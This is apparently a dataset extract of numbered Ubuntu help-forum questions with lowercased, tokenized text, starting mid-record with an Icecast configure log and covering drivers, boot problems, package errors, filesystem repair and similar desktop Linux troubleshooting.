checking for gettimeofday ... yes checking for ftime ... yes checking for library containing nanosleep ... none required checking sys/socket.h usability ... yes checking sys/socket.h presence ... yes checking for sys/socket.h ... yes checking for socklen_t ... yes checking for va_copy ... va_copy checking sys/select.h usability ... yes checking sys/select.h presence ... yes checking for sys/select.h ... yes checking sys/uio.h usability ... yes checking sys/uio.h presence ... yes checking for sys/uio.h ... yes checking winsock2.h usability ... no checking winsock2.h presence ... no checking for winsock2.h ... no checking for library containing sethostent ... none required checking for library containing getnameinfo ... none required checking for endhostent ... yes checking for getaddrinfo ... yes checking for inet_aton ... yes checking for writev ... yes checking for struct sockaddr_storage.ss_family ... yes checking for inet_pton ... yes checking for xslt-config ... no configure : error : xslt configuration could not be found readme tells me this to build icecast on a unix platform , perform the following : run ./configure make make install this is the typical procedure if you download the tar file . if you retrieve the code from subversion or want to rebuild the configure then run autogen.sh instead of the configure above . most people do not need to run autogen.sh a sample config file will be placed in /usr/local/etc ( on unix ) or in the current working directory ( on win32 ) and is called icecast.xml documentation for icecast is available in the doc directory , by viewing doc/index.html in a browser .
356006	kill a screen session	i 'm trying to kill a screen session . i noticed a lot of other related questions , but none of those answers are working for me . i am trying to kill the following session : screen -ls there is a screen on : 23520.pts-6.porkypig ( 09/30/2013 02:49:47 pm ) ( detached ) 1 socket in /var/run/screen/s-root . screen -r 23520.pts-6.porkypig now i am in the session . according to the documentation : http : //www.gnu.org/software/screen/manual/screen.html # quit i am supposed to press `` control a '' and then `` control \ '' . i do that and nothing happens . another solution said to press ctrl + a and type : quit . however , again it does n't do anything . in fact , pressing control + a , absolutely nothing happens afterwards except a message `` no other window ''
356007	ubuntu 12.04 wireless driver	so this topic has been done to death , but i have n't quite found a solution that works for me yet . i 'm using an old laptop to essentially practice interacting with linux/ubuntu . i 'm using a dell inspiron e1705 that is using windows xp media center editon as the os . i downloaded ubuntu and everything boots fine , but the issue is i have been unable to activate the driver for the network card . the wireless card is a dell wireless 1390 wlan mini-card . i 've gone to the addition drivers under hardware . it detects a broadcom sta wireless driver that is not activated . when i attempt to active it , it asks for a password that is not one that i have ever created . any help would be greatly appreciated from this ubuntu newbie !
356012	frozen ubuntu when playin video or skype webcam config	hardware : toshiba satellite s855d procesor amd a8-4500m apu with radeon ( tm ) hd graphics ă 4 operating system : ubuntu 12.04 lts problem : when launching videos ( .avi ) the sound is heard but the video is not displayed , the mouse and keyboard do not respond , the only way to exit is shutting down the pc . this happens with the video player included in ubuntu and with vlc media player . same problem happens when configuring webcam in skype , the strange thing is that i can watch videos in youtube and facebook . also i can acces the camera and video via opencv . attemped solutions : i changed from ati/amd propietary fglrx graphics dirver ( beta experimental ) to the privative one post-launching . any idea or solution ?
356014	package 'cmake ' has no installation candidate ubuntu 12.04	when i run sudo apt-get install cmake i get the following response : package cmake is not available , but is referred to by another package . this may mean the package is missing , has been obsoleted , or is only available from another source e : package 'cmake ' has no installation candidate how do i install cmake ?
356015	nvidia optimus support update on 13.04	i can see two update items nvidia optimus support nvidia optimus support using proprietary drivers i already have bumblebee installed on my system which works great for me . i am hesitant to install this update because i am not sure how well it will work . has anybody tried this update and does it bork the system ? if i do want to try this update , is there anyway to go back and restore all my previous settings including the bumblebee and driver settings ? i am more interested to know the experiences of other users regarding this update .
356019	install 12.04.3 lts 64 bit	installing to newly formatted disk . used nero to put image on dvd no errors , but docs say there should be a program folder which is not on dvd start pc boots dvd get the choice window to try or install or check etc . but choosing any of those options just results in a system reset and reboot . is there supposed to be a programs folder ? am i missing something ?
356020	ca n't boot to ubuntu from gt60 2oc ! any help ?	so , i had a gt60 onc ( msi-16f3 ) , it would easily boot to a livecd and to ubuntu and android-x86 alongside windows . but i recently `` upgraded '' to a gt60 2oc ( msi-16f4 ) and now ... i ca n't boot to the ubuntu livecd , it shows the first screen then shows a flashing cursor in the upper left of the screen then just sits there . i used another pc to do a boot repair on my sdd containing my windows with ubuntu and android and that worked to do the boot repair and i could use everything normally . but with the ssd back in my laptop , it shows the purple-ish screen but then does nothing . so if anyone knows what may need to be done , i would appreciate it . it is a windows 8 laptop , boots win7 fine . i updated to the most recent bios from the msi site .
356024	xwindows critical failue for some accounts	after i updated to kubuntu 12.04 , i lost the use of my main account in xwindows , even though it still works in the console . i created a new account called `` guest '' , and it boots to xwindows as normal . i created a third test account and tried to move all the home settings from the working guest account to the test account , but that account now shows the same problem as the main account . when i try to login to either account under xwindows it simply boots me back to the login screen . xsession error tells me : x-terminal emulator : fatal io error client killed konsole ( 2767 ) konsole : sessionmanager : :~sessionmanager : konsole sessionmanager destroyed with sessions still alive
356027	how do i get a usb2vgadvi to work on ubunut with no native driver ?	i have a startech usb2vgadvi and it has no native driver . is there a third party driver that would work ? how would i otherwise get this to work with ubuntu 12.04 lts ?
356028	ibm thinkpad t21 , pentium iii 900mhz cpu , 512 mb ram ; lubuntu ? ( variety ? )	1 ) i have an ibm thinkpad t21 of pentium iii 900mhz cpu , with 512mb ram . 2 ) which particular `` lubuntu '' exists as `` the best '' for this computer ? 3 ) please reply ; thank you .
356029	text input with wacom drawing tablet	on windows 7 when tapping a text entry field with the tablet pen an on screen keyboard or handwritten-text tool would pop up allowing me to write out text and hit the insert button . is there anything similar to this on ubuntu ? ( 13.04 ) this is what i 'm talking about if you 're unfamiliar :
356030	cdebootsrap-static fails on initramfs	from a fresh live cd of ubuntu 12.04 : # enabling universe repository sudo apt-get update sudo apt-get install cdebootstrap-static sudo cdebootstrap-static -- debug -v -- allow-unauthenticated -- flavour minimal precise /mnt http : //archive.ubuntu.com/ubuntu failed with this error : o : errors were encountered while processing : o : /var/cache/bootstrap/initramfs-tools_0.99ubuntu13_all.deb d : status : 256 e : internal error : install any ideas why ? thanks
356034	keepass2 auto-type google , and other password systems	i am going through the process of changing all my passwords using keepass2 , using 256bit encryption , with keyfile held on microsd . in test i can not seem to get my autotype to work . i created a shortcut in the keyboard manager name : keepass auto-type path : mono /usr/lib/keepass2/keepass.exe -- auto-type according to http : //keepass.info/help/v2/setup.html # mono installed xdotool as needed . i try to place auto-type password into browser https : //accounts.google.com/serviceloginauth my keepass2 entry has the title `` google '' username now when i hit the key to autotype it types a portion of the 64 characters an estimated 16 then attempts to sign in ? chromium v28.0.1500.71 : ubuntu 13.04
356036	ubuntu stuck on purple screen	i have a hp dv6 . i have had ubuntu installed on the dual boot for some time . its along side windows 7 . i have not booted ubuntu for quite some time as i have not needed it . today i decided to boot it , up and i 'm stuck on this purple screen . this has not happened before . after reading some posts i 'm sort of confused . upon boot i hold the shift key a menu comes up the second option is recovery mode . i enter and then some lines of code run for a while near the end this is the output : busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) whatever i do i do not wish to loose anything from my windows 7 or ubuntu as i have stuff in both places . my laptop has a radeon graphics card , i 've read some posts that the graphics card can be the problem
356037	why is my screen tinted blue ?	i am running ubuntu 12.04 on an hp laptop with a broken screen . i have it hooked up to an external monitor . it 's been running fine this way for close to a year , but now the screen is tinted blue . i 've checked monitors , cables , even borrowed an expansion base and used those outputs and it still does it .
356038	`` no bootable device -- insert boot disk and press any key . '' - ubuntu 12.04 install on ssd	i have new lenovo g580 notebook , where i changed 1tb hard disk to 250ssd ocz-vertex4 . i had previously installed windows and linux 12.04 on this disc and when i put it in new lenovo g580 suprisingly ubuntu has worked . till today ... when i decided to format ssd and install ubuntu restoring disc space taken by unused win8 . what i have done was creating bootable usb pendrive with ubuntu 12.04 x64 . boot system from it and install . partition was like 16mb for grubbios area ( something similar to this ) . 256mb for /boot ( which i choose for bootable ) 75gb for / rest for /home . this is my partitioning settings . after installation when i get try ubuntu from usb live i can find this division and it seems to be correct . unfortunatelly when i try to start from configuration : bios version : 5ecn42ww ( v4.01 ) ec version : 5eec42ww ( v4.01 ) cpu i5-3230m usb legacy enabled [ enabled ] wireless lan support [ enabled ] sata controller mode [ ahci ] pxe boot to lan [ disabled/enabled ] boot : uefi boot [ disabled/enabled ] boot device priority : 1.internal hdd : ocz-vertex4 2.sata odd : matshita dvd-ram uj8d1 3.usb hdd : kingstondatatraveler g3 when i start it displays : no bootable device -- insert boot disk and press any key . what would be the solution for this problem ? when i get f12 during bios startup , it shows me the list which has this : internal hdd : ocz-vertex4..
356040	how do i install the mythbuntu environment inside of ubuntu ?	i have installed the kde environment along with ubuntu 13.04 and i was just wondering how to do it with mythubuntu and the other types of ubuntu . please help me with mythbuntu and tell me how to install the other environments too if you know how too ! thanks ! !
356043	how to access iphone through usb	i plugged my i phone into the usb port and donât see the photos or music . i looked in search computer and online sources . thanks john
356045	how do i get chrome app launcher ?	i was reading this article . i 'm a little confused on how to get the chrome app launcher . they put a link , but it goes nowhere . can anyone help ? or can anyone suggest an app in the ubuntu software center that would look the same ?
356046	i ca n't install libdvdcss - script not finding medibuntu , how to get dvd playback ?	i am trying to get these instructions working on 12.04 , i know i am connected to the internet but it does n't seem to work . $ sudo /usr/share/doc/libdvdread4/install-css.sh -- 2013-10-09 19:18:44 -- http : //packages.medibuntu.org/dists/precise/free/binary-i386/packages resolving packages.medibuntu.org ( packages.medibuntu.org ) ... 88.191.127.22 connecting to packages.medibuntu.org ( packages.medibuntu.org ) |88.191.127.22|:80 ... connected . http request sent , awaiting response ... 404 not found 2013-10-09 19:18:44 error 404 : not found . dynamic fetch failed ; falling back to static fetch -- 2013-10-09 19:18:44 -- http : //packages.medibuntu.org/pool/free/libd/libdvdcss/libdvdcss2_1.2.10-0.2medibuntu1_i386.deb resolving packages.medibuntu.org ( packages.medibuntu.org ) ... 88.191.127.22 connecting to packages.medibuntu.org ( packages.medibuntu.org ) |88.191.127.22|:80 ... connected . http request sent , awaiting response ... 404 not found 2013-10-09 19:18:44 error 404 : not found . i am trying to get dvd playback going , how can i fix this ?
356052	how to use alsa instead of pulseaudio without uninstalling pulseaudio ?	so when pulseaudio is installed on my computer , there is no sound . however , if i uninstall pulseaudio , the ubuntu sound indicator has to be uninstalled too . how can i use alsa by default without having pulseaudio uninstalled ? or , how can i uninstall pulseaudio without uninstalling the sound-indicator ?
356054	xchat : how to hide join/leave messages	i am wondering if there is a way to hide the 'blalbal has joins the # channel ' messages for people joining and leaving . there are so many of them . i am using the irc client xchat .
356060	dependency error installing curl ?	i 'm having trouble installing curl . i get this error : $ sudo apt-get install curl reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : curl : depends : libcurl3 ( = 7.29.0-1ubuntu3 ) but 7.29.0-1ubuntu3.1 is to be installed e : unable to correct problems , you have held broken packages . edit : the linked page did help me navigate through apt , but did n't solve the problem . eventually i found that i had to uninstall google-chrome , install curl , then reinstall google-chrome . so there was some dependency conflict there . but it 's working now .
356061	i am currently running 12.04 , my system has just shown me that i can upgrade to 12.10 , i am aware that there is a version 13 . should i upgrade ?	am a little unsure what i should be doing here . is it best for me to keep upgrading as new versions emerge or should i just stick with what i have ? i am relatively computer literate but feel a bit overwhelmed by this . any simple information you can give me that would help my system not to crash or cause major problems would be great ! also , what should my 'update ' settings be set to ? should i just 'tick ' all the boxes ?
356071	how to set header and footer in libreoffice outside the border	i am using libreoffice for creating documents in 13.04 , but i ca n't move header and footer outside border , is there any to do it ?
356074	is it possible to have single wi-fi device switch between client and hotspot modes ?	i have a portable ubuntu machine ( odroid ) with wifi adapter . i can setup wifi hotspot with it , or i can use it to access other wifi network . the question is can i use it as hotspot , but then switch to client mode when certain network is within the range ? example . device is within the range of my home network , so it connects to home network . then i pick up device and walk away and connection with home network drops , so device is now used as hotspot . i have a theory/idea about how to make device into hotspot when connection with certain network is lost , but not the other way around .
356075	can i implement tab autocomplete in a bash script ?	i have a script that , when a user enters a file name in a directory , performs automatic tagging operations on that file ( mp3 tagging ) . my problem : it gets really tedious typing in the exact file name of every song i want to tag , and i was wondering if it is possible to implement tab autocompletion when i input the name of a file . the beginning of my script : input file name and locate file echo `` enter name of file to be tagged '' read -e filename filefindtest= $ ( find ~/downloads/ '' $ filename '' ) echo `` $ filefindtest ''
356077	want to create super user ( administrator ) account ?	have installed ubuntu 13.04 . while login , i am unable to login using user name and password . so i am loging in by using guest account . i need to create the admin account now . can any one help me . i have also tried sudo su but it says , `` unable to change to sudoers gid : operation not permitted . '' i have tried su also but when i enter the password it says , `` authentication failure '' . regards vijay
356078	sound applet is not working , but alsa mixer does ?	sound applet is turned off after installed pulse audio.even pulse sound controller is not working.if made it force delete also had left with configuration file in pulse.from music player can adjust sound but sound controller is not detecting any input device .
356083	if i setup a bootable disk do i lose my files ?	i want to install ubuntu from a bootable usb drive . i 'm thinking of creating the bootable drive by following these instructions . the drive i have is a 500gb usb external drive . in it i have many files , videos , pictures and other stuff . if i go on with this procedure , will i lose my files ? or will they be preserved ?
356085	can i leave gparted on a system after installation ?	is it possible to leave gparted on the system after installation , seeing as it is already on the liveusb ? as a related question , why is it removed from the final system in the first place ?
356090	python installation problem on ubuntu	i tried to launch dropbox on ubuntu . i got the following error : traceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 563 , in < module > main ( ) file `` /usr/lib/python2.7/site.py '' , line 545 , in main known_paths = addusersitepackages ( known_paths ) file `` /usr/lib/python2.7/site.py '' , line 272 , in addusersitepackages user_site = getusersitepackages ( ) file `` /usr/lib/python2.7/site.py '' , line 247 , in getusersitepackages user_base = getuserbase ( ) # this will also set user_base file `` /usr/lib/python2.7/site.py '' , line 237 , in getuserbase user_base = get_config_var ( 'userbase ' ) file `` /usr/lib/python2.7/sysconfig.py '' , line 578 , in get_config_var return get_config_vars ( ) .get ( name ) file `` /usr/lib/python2.7/sysconfig.py '' , line 505 , in get_config_vars import re file `` /usr/lib/python2.7/re.py '' , line 105 , in < module > import sre_compile file `` /usr/lib/python2.7/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/lib/python2.7/sre_parse.py '' , line 802 syntaxerror : non-ascii character '\x80 ' in file /usr/lib/python2.7/sre_parse.py on line 802 , but no encoding declared ; see http : //www.python.org/peps/pep-0263.html for details ` i tried to have a look at /usr/lib/python2.7/sre_parse.py but this file has only one line ( and not more than 802 ... ) # ^m # secret labs ' regular expression engine^m # ^m # convert re-style regular expression to sre pattern^m # ^m # copyright ( c ) 1998-2001 by secret labs ab . all rights reserved.^m # ^m # see the sre.py file for information on usage and redistribution.^m # ^m^m '' '' '' internal support module for sre '' '' '' ^m^m # xxx : show string offset and offending character for all errors^m^mimport sys^m^mfrom sre_constants import *^mfrom _sre import maxrepeat^m^mspecial_chars = `` .\ [ { ( ) *+ ? ^ $ | '' ^mrepeat_chars = `` *+ ? { `` ^m^mdigits = set ( `` 0123456789 '' ) ^m^moctdigits = set ( `` 01234567 '' ) ^mhexdigits = set ( `` 0123456789abcdefabcdef '' ) ^m^mwhitespace = set ( `` \t\n\r\v\f '' ) ^m^mescapes = { ^m r '' \a '' : ( literal , ord ( `` \a '' ) ) , ^m r '' \b '' : ( literal , ord ( `` \b '' ) ) , ^m r '' \f '' : ( literal , ord ( `` \f '' ) ) , ^m r '' \n '' : ( literal , ord ( `` \n '' ) ) , ^m r '' \r '' : ( literal , ord ( `` \r '' ) ) , ^m r '' \t '' : ( literal , ord ( `` \t '' ) ) , ^m r '' \v '' : ( literal , ord ( `` \v '' ) ) , ^m r '' \ '' : ( literal , ord ( `` \ '' ) ) ^m } ^m^mcategories = { ^m r '' \a '' : ( at , at_beginning_string ) , # start of string^m r '' \b '' : ( at , at_boundary ) , ^m r '' \b '' : ( at , at_non_boundary ) , ^m r '' \d '' : ( in , [ ( category , category_digit ) ] ) , ^m r '' \d '' : ( in , [ ( category , category_not_digit ) ] ) , ^m r '' \s '' : ( in , [ ( category , category_space ) ] ) , ^m r '' \s '' : ( in , [ ( category , category_not_space ) ] ) , ^m r '' \w '' : ( in , [ ( category , category_word ) ] ) , ^m r '' \w '' : ( in , [ ( category , category_not_word ) ] ) , ^m r '' \z '' : ( at , at_end_string ) , # end of string^m } ^m^mflags = { ^m # standard flags^m `` i '' : sre_flag_ignorecase , ^m `` l '' : sre_flag_locale , ^m `` m '' : sre_flag_multiline , ^m `` s '' : sre_flag_dotall , ^m `` x '' : sre_flag_verbose , ^m # extensions^m `` t '' : sre_flag_template , ^m `` u '' : sre_flag_unicode , ^m } ^m^mclass pattern : ^m # master pattern object . keeps track of global attributes^m def init ( self ) : ^m self.flags = 0^m self.open = [ ] ^m self.groups = 1^m self.groupdict = { } ^m def opengroup ( self , name=none ) : ^m gid = self.groups^m self.groups = gid + 1^m if name is not none : ^m ogid = self.groupdict.get ( name , none ) ^m if ogid is not none : ^m raise error , ( `` redefinition of group name % s as group % d ; `` ^m `` was group % d '' % ( repr ( name ) , gid , ogid ) ) ^m self.groupdict [ name ] = gid^m self.open.append ( gid ) ^m return gid^m def closegroup ( self , gid ) : ^m self.open.remove ( gid ) ^m def checkgroup ( self , gid ) : ^m return gid < self.groups and gid not in self.open^m^mclass subpattern : ^m # a subpattern , in intermediate form^m def init ( self , pattern , data=none ) : ^m self.pattern = pattern^m if data is none : ^m data = [ ] ^m self.data = data^m self.width = none^m def dump ( self , level=0 ) : ^m nl = 1^m seqtypes = type ( ( ) ) , type ( [ ] ) ^m for op , av in self.data : ^m print level* '' `` + op , ; nl = 0^m if op == `` in '' : ^m member sublanguage^m print ; nl = 1^m for op , a in av : ^m print ( level+1 ) * '' `` + op , a^m elif op == `` branch '' : ^m print ; nl = 1^m i = 0^m for a in av1 : ^m if i > 0 : ^m print level* '' `` + `` or '' ^m a.dump ( level+1 ) ; nl = 1^m i = i + 1^m elif type ( av ) in seqtypes : ^m for a in av : ^m if isinstance ( a , subpattern ) : ^m if not nl : print^m a.dump ( level+1 ) ; nl = 1^m else : ^m print a , ; nl = 0^m else : ^m print av , ; nl = 0^m if not nl : print^m def repr ( self ) : ^m return repr ( self.data ) ^m def len ( self ) : ^m return len ( self.data ) ^m def delitem ( self , index ) : ^m del self.data [ index ] ^m def getitem ( self , index ) : ^m if isinstance ( index , slice ) : ^m return subpattern ( self.pattern , self.data [ index ] ) ^m return self.data [ index ] ^m def setitem ( self , index , code ) : ^m self.data [ index ] = code^m def insert ( self , index , code ) : ^m self.data.insert ( index , code ) ^m def append ( self , code ) : ^m self.data.append ( code ) ^m def getwidth ( self ) : ^m # determine the width ( min , max ) for this subpattern^m if self.width : ^m return self.width^m lo = hi = 0l^m unitcodes = ( any , range , in , literal , not_literal , category ) ^m repeatcodes = ( min_repeat , max_repeat ) ^m for op , av in self.data : ^m if op is branch : ^m i = sys.maxint^m j = 0^m for av in av1 : ^m l , h = av.getwidth ( ) ^m i = min ( i , l ) ^m j = max ( j , h ) ^m lo = lo + i^m hi = hi + j^m elif op is call : ^m i , j = av.getwidth ( ) ^m lo = lo + i^m hi = hi + j^m elif op is subpattern : ^m i , j = av1.getwidth ( ) ^m lo = lo + i^m hi = hi + j^m elif op in repeatcodes : ^m i , j = av2.getwidth ( ) ^m lo = lo + long ( i ) * av [ 0 ] ^m hi = hi + long ( j ) * av1^m elif op in unitcodes : ^m lo = lo + 1^m hi = hi + 1^m elif op == success : ^m break^m self.width = int ( min ( lo , sys.maxint ) ) , int ( min ( hi , sys.maxint ) ) ^m return self.width^m^mclass tokenizer : ^m def init ( self , string ) : ^m self.string = string^m self.index = 0^m self.__next ( ) ^m def __next ( self ) : ^m if self.index > = len ( self.string ) : ^m self.next 1,1 all can anyone help me ? edit as timo explained to me , the copy/paste of my file shows that it is not usual . i am therefore trying to reinstall python on my system . i first tried this , with python2.4 ( which is the default version on my computer ) , but the same problem occurred . i then tried following the instructions here , but i can not even launch the software center ( i guess this is because of the python problem ) . can anyone show me there /usr/lib/python2.7/sre_parse.py file ? i am thinking copying it ... if you have a better idea , please let me know
356091	microsoft silverlight not in ubuntu 13.04 netflix desktop app	i thought it would be fun to put ubuntu 13.04 64-bit on my pc , i have been told netflix would work on 64-bit , bit it did n't . i checked terminal , long story short with 64-bit was i do n't know what foreign architecture support and i do n't know how to use it . i dual operated it with ubuntu 13.04 32-bit and got the netflix desktop app and now i need microsoft silverlight . please help me i am at my witts end . i need to know how to use netflix on ubuntu 13.04 32 or 64 bit ( terminal says i386 in foreign architecture support in 64-bit ) . thanks
356094	how can i force gpg to use gpg-agent over seahorse ( gnome-keyring-daemon ) in ubuntu 12.04 lts ?	i want to use gpg-agent ( and its gpg.conf and gpg-agent.conf files ) when i invoke gpg ( from enigmail or otherwise ) but ubuntu 12.04 uses seahorse as the default 'agent . ' while seahorse may or may not read these conf files , how can i force gpg to bypass ubuntu 's setup and use gpg-agent ? this is what i see when i ask the terminal to return $ gnu_agent_info : user @ user : ~ $ echo $ gnu_agent_info /tmp/keyring-xxxxxx/gpg:0:1 following the gpg man page , i have tried adding the following lines to my gpg.conf file without desired result : -- gpg-agent-info=/usr/bin/gpg-agent -- gpg-agent-info=/usr/bin/gpg-agent:0:1 thanks . ps : in addition , does seahorse use equivalent files of the same path and name ( gpg.conf , gpg-agent.conf ) ? if not , what are the paths and names i could use to reach equivalent result ?
356095	pcmanfm - ca n't interact between 2 windows .	i have one pcmanfm on the left and one on the right . i ca n't drag files from the window on the left to the right one . this works in nautilus , and thunar just like i expect it to work . the weird thing is this problem only occurs when both pcmanfm windows are in detailed list view . is this a bug ? in nautilus it works fine if both are in list view . in pcmanfm it does not .
356098	what is the skimlinks scope and how does it work	what is the skimlinks scope ( 'more_suggestions-skimlinks.scope ) and what results does it show or what links does it create in the dash . all i know is skimlinks affiliates links so how does this work with upcoming ubuntu 13.10 smart scopes
356099	how do i find the kerner version in ubuntu 13.04	i 'm trying to find the kernel verion running on my system . i 'm running ubuntu 13.04 with the gnome desktop because a failed ati/amd driver install moofed my unity desktop and i have n't been able to get it back ... even though i 've removed the offending drivers and re-installed the generic version that came with the original install .
356101	ext4 constantly mounts as read-only	i 'm at a complete loss , here . after only using my computer for short periods of time ( often less than a minute ) , my root partition ( ext 4 , /dev/sda5 ) become read-only without warning . this happens constantly , and i 'm not sure why . i 'm really hoping not to have to do a fresh install . i 've tried rebooting , but the routine fsck that ubuntu performs during boot fails to fix the partition . if i either let it boot and press m to manually recover , or boot in recovery mode and use a root terminal , i can usually fix the issue using fsck -f -v -y /dev/sda5 . it 's worth noting that i 've also tried using a live usb stick ( with linux mint on it ) , and running fsck from there . also , i used the old version of pared magic that comes with version 15.0 of hiren 's boot cd . however , the issue rears it 's ugly head almost instantly when i reboot , regardless of how i run fsck . i even went so far as to reinstall some ext2/3/4 packages from the terminal : sudo apt-get install -- reinstall e2fslibs e2fsprogs & & sudo reboot . still no dice . i have also tried booting into multiple kernel versions , each gave me the same issue . this particular computer running ubuntu 13.04 , 32-bit version . here 's a the exact info bash displayed during of one of my attempts at fixing the partition using linux mint : # fsck /dev/sda5 -y -v fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) freedom contains a file system with errors , check forced . pass 1 : checking inodes , blocks , and sizes deleted inode 1324553 has zero dtime . fix ? yes inodes that were part of a corrupted orphan linked list found . fix ? yes inode 1324554 was part of the orphaned inode list . fixed . pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information block bitmap differences : - ( 11474858 -- 11474863 ) - ( 11519854 -- 11519861 ) fix ? yes free blocks count wrong for group # 350 ( 25342 , counted=25348 ) . fix ? yes free blocks count wrong for group # 351 ( 27260 , counted=27268 ) . fix ? yes free blocks count wrong ( 8929729 , counted=8929743 ) . fix ? yes inode bitmap differences : - ( 1324553 -- 1324554 ) fix ? yes free inodes count wrong for group # 162 ( 5151 , counted=5153 ) . fix ? yes free inodes count wrong ( 3000124 , counted=3000126 ) . fix ? yes freedom : ***** file system was modified ***** 392914 inodes used ( 11.58 % , out of 3393040 ) 2999 non-contiguous files ( 0.8 % ) 676 non-contiguous directories ( 0.2 % ) # of inodes with ind/dind/tind blocks : 7328/467/0 extent depth histogram : 208561/63 4640048 blocks used ( 34.19 % , out of 13569791 ) 0 bad blocks 1 large file 273494 regular files 39518 directories 57 character device files 25 block device files 1 fifo 32 links 79787 symbolic links ( 62924 fast symbolic links ) 23 sockets -- -- -- -- -- -- 392937 files if there 's anything i can do to provide more detailed information , please let me know . update # 1 : after using hiren 's boot cd once again , i was able to boot into the `` mini xp '' environment and run two disk checking utilities ( victoria , and hd tune ) . victoria gave me some interesting s.m.a.r.t results : hdtune was a real letdown for me : the question for me now is , is this an indicator of a hard drive about to die completely ? update # 2 : i had previously added some images to this post , but discovered they were n't viewable . however , i 've just re-uploaded them to a different website , and re-posted them . therefore , they should now be visible .
356104	can i change os from widows 8.1 pro to ubuntu ?	i have a lenovo ideapad z500 running windows 8.1 pro but get many problems such as `` reset your pc not working `` insert media some files are missing . your windows installation or recovery medial will provide these files '' . this is a frequent occurrence . i have tried reinstalling and repairing but the same problem arises . microsoft 's answer to this is : how to create installation media for a pc refresh or reset http : //windows.microsoft.com/en-in/windows-8/create-reset-refresh-media but i ca n't do this as i do n't have a pc running windows 7 . there is also the problem of so many unwanted adverts on windows 8 that i get frustrated at times as othe time consuming problems arise . a computer savvy friend suggests i change the os to linux 12.04 , so i ask do you have experience of this and is the os compatible with the z500 . is it a simple uninstall windows 8 and install linux or are there complications ? failing that do i downgrade to windows 7 ( at more cost ) or can you recommend some other option . windows 8 is totally spoiled because of all the intrusive adverts , especially on xbox .
356106	strace : errors in access	i am running an executable ( of c program ) with strace command and get the following output . please help me out why does it gives error in access and also this whole process gets killed at the end ? please give me some direction that what can be the potential reasons behind this .
356107	removing ubuntu from dual boot windows 7 pc	how to remove the ubuntu os installed on a separate partition from a dual boot windows 7 pc . i would like to continue using win 7. the grub should also be sorted out .
356111	i need to install the catalyst drivers for my adapter	the numbers on my ati card are hd - 435x - za hd - 435x - zah2 - vp2 . if anyone knows a stable catalyst driver for this card that will work with ubuntu 13.04 it would be appreciated . could also use directions for installing it correctly as i 've had a lot of problems with the drivers in the software centre . the problem with the generic drivers with the installation is the 3d accelerators are n't there and this is required by the program i use . thanx in advance for any and all assistance with this .
356115	i may be stupid but i ca n't find my terminal window , i just installed version 12.04.3 , help	i ca n't find my terminal window , i just installed version 12.04.3 , help..
356117	downloading problems from center	i am new to ubuntu . i just run sudo apt-get update in a terminal and it shows this error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en , e : the package lists or status file could not be parsed or opened please help
356118	ntpd segfaults on 12.04 lts ( 64-bit )	fresh install of ubuntu 12.04 lts . installed ntp , but starting the service only results in the following error : grsec : segmentation fault occurred at 0000000000000008 in /usr/sbin/ntpd [ ntpd:28951 ] uid/euid:108/108 gid/egid:116/116 , parent /sbin/init [ init:1 ] uid/euid:0/0 gid/egid:0/0 i found https : //bugs.launchpad.net/ubuntu/+source/liblockfile/+bug/941968 and it appears to be generated by long host names ( mine was 26 char , as generated by the hosting provider ( ns12345678ip-123-45-67.net is an example ) . i changed the hostname in /etc/hosts to something short and also ran hostname shortname , but still the same error . any suggestions ? thank you .
356120	how do i change the vertical font-spacing of system fonts ?	i just changed the system fonts form ubuntu to helvetica neue using the advanced settings package from the ubuntu store ( unity tweak tool ) . the problem is , the fonts are not vertically centred with the icons - they are top-aligned . it looks weird whenever the icon size is bigger than the font ( changing font-size did n't do the trick ) . thanks in advance for the help !
356122	the package lists or status file could not be parsed or opened	i upgrade system from 13.04 to 13.10 then i restarted system the problem is coming ''the package lists or status file could not be parsed or opened . '' rajuramvani .
356126	how add user a sudo group	i accidentally removed the default user system , ubuntu , from the sudo group . how can i do to regain root access ? thanks .
356127	how to torify flashplayer plugin in firefox ?	flashplayer plugin is ignoring the proxy settings of firefox , any idea on how to make all the flashplayer traffic go through proxy ?
356129	use iozone to check read/write performance of ext4 and btrfs ?	can someone help me to use iozone filesystem benchmark tool on ubuntu to check the performance of ext4 and btrfs filesystems ? i have installed ubuntu into a vm .
356130	which ubuntu version will suit my computer	my computer configuration pentium d102ggc2 2.80 ghz 2gb ram 1tb hard disk ati radeon xpress 200 plz suggest which ubuntu version will good for me
356131	ca n't boot up ubuntu after changing grub file with nomodeset ?	so i was trying to get ubuntu to be able to change the screen brightness correctly , and in one of the forum posts , someone suggested to try to change the grub file with `` nomodeset . '' after i did so , my ubuntu boots up to a full purple screen and gets stuck there . i pretty much need to be able to modify my grub file again and change it to what it originally was . how can i do that ? help please ? edit : i tried booting into recovery mode , but i ca n't get past the black screen with all the text written on it . i think i 'm getting a udevd error related to my graphics card .
356134	possible to install lubuntu 12.04 over an existing dual boot ubuntu 13.04 ?	i recently installed ubuntu 13.04 on an amd 64-bit hp slimline machine ( 1 gb of ram expanded to 2gb ) that is about 5-7 years old , and i believe/realized that it would probably work/perform better if i installed 12.04 lts instead . is it possible to downgrade from vanilla ubuntu 13.04 to lubuntu 12.04 , or just to simply re-install over it ? p.s . i am dual booting ubuntu and windows 7 , and have a 20 gb ext4 partition in which my ubuntu raring installation resides on . ( 200 gb total disk space ) thanks in advance . ( i do n't post to forums to often so feel free to correct me if i did anything wrong ! : - ) )
